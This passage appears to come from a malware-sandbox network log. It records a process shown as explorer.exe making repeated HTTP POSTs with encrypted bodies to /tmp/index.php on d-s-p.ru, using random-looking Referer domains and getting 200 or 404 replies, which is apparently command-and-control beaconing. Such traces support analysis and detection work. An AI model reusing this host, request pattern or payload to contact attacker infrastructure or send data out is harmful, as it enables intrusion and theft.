                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://duabtcnoqxwepta.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 193
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:33.963427067 CET193OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 23 31 ba f1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu#1e6p_e~IK/qs%2Bj}*1%&$ VxU^)J)u0CQfb
                                                                                                                                                                                Dec 30, 2024 19:42:35.390779018 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:35 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                9192.168.2.44974558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:35.400616884 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ilgayipokchjnwi.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 133
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:35.400640011 CET133OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 24 26 d2 95
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu$&u!nzNxo?Q3)wybv>F
                                                                                                                                                                                Dec 30, 2024 19:42:36.871290922 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:36 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                10192.168.2.44974658.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:36.882741928 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jifjhlrdcghs.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 338
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:36.882775068 CET338OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 70 31 a6 8a
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vup1jkD|l^=t;Gmwc)S=Qh%?S|bRwd9~8f[#P>#[\t/K>(xyq$)TGo
                                                                                                                                                                                Dec 30, 2024 19:42:38.355526924 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:38 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                11192.168.2.44974758.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:38.363780022 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://yawtrsbxaqno.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 149
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:38.363797903 CET149OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 65 4e ca 85
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vueN}Fy^pV7n>=[F/zw\X]670/MAF(:
                                                                                                                                                                                Dec 30, 2024 19:42:40.058830976 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                12192.168.2.44974858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:40.066457033 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://askrbnixhwd.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 121
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:40.066488981 CET121OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 63 2c cf e8
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuc,\TsAa?)Eo[.
                                                                                                                                                                                Dec 30, 2024 19:42:41.554379940 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:41 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                13192.168.2.44974958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:41.562881947 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://bmvgxhhwuegchsnk.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 360
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:41.562881947 CET360OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 57 56 c2 f1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuWVy9nP_D+r"xw;0w8'E&PBJN1!HTR?<C:iWyLz}1Y"CX{pqLvw;aL)J
                                                                                                                                                                                Dec 30, 2024 19:42:43.007309914 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:42 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                14192.168.2.44975058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:43.015362024 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://fumgmeseepesr.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 215
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:43.015408993 CET215OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 54 28 a6 f1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuT(rLYLc>yM<w3MJH>~W[wi(wtx1@?yf}vb[+--
                                                                                                                                                                                Dec 30, 2024 19:42:44.454025984 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:44 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                15192.168.2.44975158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:44.466878891 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://kjsrpmbmjduiwv.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:44.466922045 CET129OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 35 5c a1 f8
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu5\"aCRb'9=<d[*>
                                                                                                                                                                                Dec 30, 2024 19:42:45.942068100 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:45 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                16192.168.2.44975258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:45.949636936 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ksvvejaqmamsa.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 141
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:45.949654102 CET141OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 6e 3a e7 98
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vun:]8Rp}><GC=_`3!DmFFp'
                                                                                                                                                                                Dec 30, 2024 19:42:47.461075068 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                17192.168.2.44975358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:47.469727039 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vtfnihcjaxwmos.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 248
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:42:47.469742060 CET248OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 28 2e b4 ed
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu(.P/M|"D|F(k'E+<"FRr02=EdQ;=+EK3fjWm%>w`J; zl{vp&?g
                                                                                                                                                                                Dec 30, 2024 19:42:48.939321041 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:42:48 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                18192.168.2.44975458.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:42:48.950985909 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://amrgqqtkvbsuyfiq.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 273
                                                                                                                                                                                Host: d-s-p.ru
